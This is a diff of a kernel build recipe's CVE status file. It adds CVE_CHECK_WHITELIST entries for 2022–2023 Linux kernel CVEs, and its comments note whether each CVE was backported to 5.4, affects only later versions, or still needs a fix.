+# CVE-2022-47946 needs backporting (fixed from 5.12rc2)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4842"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48423"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48424"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48425"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48502"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-48619"
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-48626"
+
+# CVE-2022-48627 needs backporting (fixed from 5.19rc7)
+
+# CVE-2022-48628 needs backporting (fixed from 6.6rc1)
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-48629"
+
+# fixed-version: only affects 5.17 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48630"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2023-0030"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0045"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2023-0047"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0122"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-0160"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0179"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0210"
+
+# CVE-2023-0240 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0266"
+
+# CVE-2023-0386 needs backporting (fixed from 6.2rc6)
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0394"
+
+# cpe-stable-backport: Backported in 5.4.230
+CVE_CHECK_WHITELIST += "CVE-2023-0458"
+
+# cpe-stable-backport: Backported in 5.4.233
+CVE_CHECK_WHITELIST += "CVE-2023-0459"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0461"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0468"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0469"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-0590"
+
+# CVE-2023-0597 needs backporting (fixed from 6.2rc1)
+
+# cpe-stable-backport: Backported in 5.4.223
+CVE_CHECK_WHITELIST += "CVE-2023-0615"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1032"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-1073"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-1074"
+
+# CVE-2023-1075 needs backporting (fixed from 6.2rc7)
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1076"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1077"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-1078"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1079"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2023-1095"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1118"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1192"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1193"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1194"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1195"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-1206"
+
+# CVE-2023-1249 needs backporting (fixed from 5.18rc1)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1252"
+
+# CVE-2023-1281 needs backporting (fixed from 6.2)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1295"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-1380"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2023-1382"
+
+# cpe-stable-backport: Backported in 5.4.92
+CVE_CHECK_WHITELIST += "CVE-2023-1390"
+
+# CVE-2023-1476 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-1513"
+
+# CVE-2023-1582 needs backporting (fixed from 5.17rc4)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1583"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-1611"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2023-1637"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1652"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-1670"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1829"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-1838"
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-1855"
+
+# cpe-stable-backport: Backported in 5.4.241
+CVE_CHECK_WHITELIST += "CVE-2023-1859"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1872"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-1989"
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-1990"
+
+# fixed-version: only affects 5.19rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1998"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-2002"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2006"
+
+# CVE-2023-2007 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.202
+CVE_CHECK_WHITELIST += "CVE-2023-2008"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2019"
+
+# cpe-stable-backport: Backported in 5.4.252
+CVE_CHECK_WHITELIST += "CVE-2023-20569"
+
+# CVE-2023-20588 needs backporting (fixed from 6.5rc6)
+
+# cpe-stable-backport: Backported in 5.4.250
+CVE_CHECK_WHITELIST += "CVE-2023-20593"
+
+# CVE-2023-20928 needs backporting (fixed from 6.0rc1)
+
+# CVE-2023-20937 has no known resolution
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-20938"
+
+# CVE-2023-20941 has no known resolution
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21102"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21106"
+
+# cpe-stable-backport: Backported in 5.4.249
+CVE_CHECK_WHITELIST += "CVE-2023-2124"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21255"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21264"
+
+# CVE-2023-21400 has no known resolution
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2156"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-2162"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2163"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2166"
+
+# CVE-2023-2176 needs backporting (fixed from 6.3rc1)
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2023-2177"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-2194"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2235"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2236"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2248"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-2269"
+
+# CVE-2023-22995 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22996"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22997"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22998"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22999"
+
+# CVE-2023-23000 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23001"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23002"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23003"
+
+# CVE-2023-23004 needs backporting (fixed from 5.19rc1)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23005"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2023-23006"
+
+# CVE-2023-23039 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-23454"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-23455"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-23559"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23586"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2430"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-2483"
+
+# fixed-version: only affects 5.6rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-25012"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2513"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-25775"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2598"
+
+# CVE-2023-26242 has no known resolution
+
+# CVE-2023-2640 has no known resolution
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26544"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-26545"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26605"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26606"
+
+# cpe-stable-backport: Backported in 5.4.225
+CVE_CHECK_WHITELIST += "CVE-2023-26607"
+
+# cpe-stable-backport: Backported in 5.4.227
+CVE_CHECK_WHITELIST += "CVE-2023-28327"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-28328"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28410"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28464"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-28466"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2023-2860"
+
+# CVE-2023-28746 needs backporting (fixed from 6.9rc1)
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2023-28772"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28866"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2898"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-2985"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-3006"
+
+# Skipping CVE-2023-3022, no affected_versions
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-30456"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-30772"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2023-3090"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2023-3106"
+
+# Skipping CVE-2023-3108, no affected_versions
+
+# CVE-2023-31081 has no known resolution
+
+# CVE-2023-31082 has no known resolution
+
+# CVE-2023-31083 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-31084 needs backporting (fixed from 6.4rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-31085"
+
+# cpe-stable-backport: Backported in 5.4.247
+CVE_CHECK_WHITELIST += "CVE-2023-3111"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3117"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-31248"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2023-3141"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-31436"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2023-3159"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-3161"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3212"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-3220"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-32233"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32247"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32248"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32250"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32252"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32254"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32257"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32258"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-32269"
+
+# CVE-2023-32629 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-3268"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3269"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3312"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3317"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-33203"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33250"
+
+# CVE-2023-33288 needs backporting (fixed from 6.3rc4)
+
+# cpe-stable-backport: Backported in 5.4.248
+CVE_CHECK_WHITELIST += "CVE-2023-3338"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3355"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3357"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-3358"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3359"
+
+# CVE-2023-3389 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3390"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33951"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33952"
+
+# CVE-2023-3397 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.249
+CVE_CHECK_WHITELIST += "CVE-2023-34255"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-34256"
+
+# fixed-version: only affects 6.1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-34319"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-34324"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3439"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-35001"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-3567"
+
+# CVE-2023-35693 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2023-35788"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35823"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35824"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-35826"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-35827"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35828"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-35829"
+
+# cpe-stable-backport: Backported in 5.4.248
+CVE_CHECK_WHITELIST += "CVE-2023-3609"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3610"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-3611"
+
+# CVE-2023-3640 has no known resolution
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-37453"
+
+# CVE-2023-37454 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-3772"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3773"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3776"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3777"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2023-3812"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38409"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38426"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38427"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38428"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38429"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38430"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38431"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38432"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3863"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3865"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3866"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3867"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39189"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-39191"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39192"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39193"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-39194"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-39197"
+
+# CVE-2023-39198 needs backporting (fixed from 6.5rc7)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4004"
+
+# CVE-2023-4010 has no known resolution
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4015"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-40283"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-40791"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4128"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-4132"
+
+# CVE-2023-4133 needs backporting (fixed from 6.3)
+
+# CVE-2023-4134 needs backporting (fixed from 6.5rc1)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4147"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4155"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4194"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4206"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4207"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4208"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4244"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4273"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42752"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42753"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-42754"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42755"
+
+# fixed-version: only affects 6.4rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-42756"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2023-4385"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-4387"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4389"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4394"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-44466"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-4459"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4563"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4569"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-45862"
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2023-45863"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-45871"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-45898"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4610"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4611"
+
+# CVE-2023-4622 needs backporting (fixed from 6.5rc1)
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-4623"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-46343"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-46813"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-46838"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-46862"
+
+# CVE-2023-47233 needs backporting (fixed from 6.9rc1)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4732"
+
+# CVE-2023-4881 needs backporting (fixed from 6.6rc1)
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-4921"
+
+# CVE-2023-50431 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5090"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-51042"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-51043"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5158"
+
+# CVE-2023-51779 needs backporting (fixed from 6.7rc7)
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2023-5178"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51780"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51781"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51782"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5197"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2023-52340"
+
+# CVE-2023-52429 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52433"
+
+# CVE-2023-52434 needs backporting (fixed from 6.7rc6)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52435"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52436"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52438"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52439"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52440"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52441"
+
+# CVE-2023-52442 needs backporting (fixed from 6.5rc4)
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52443"
+
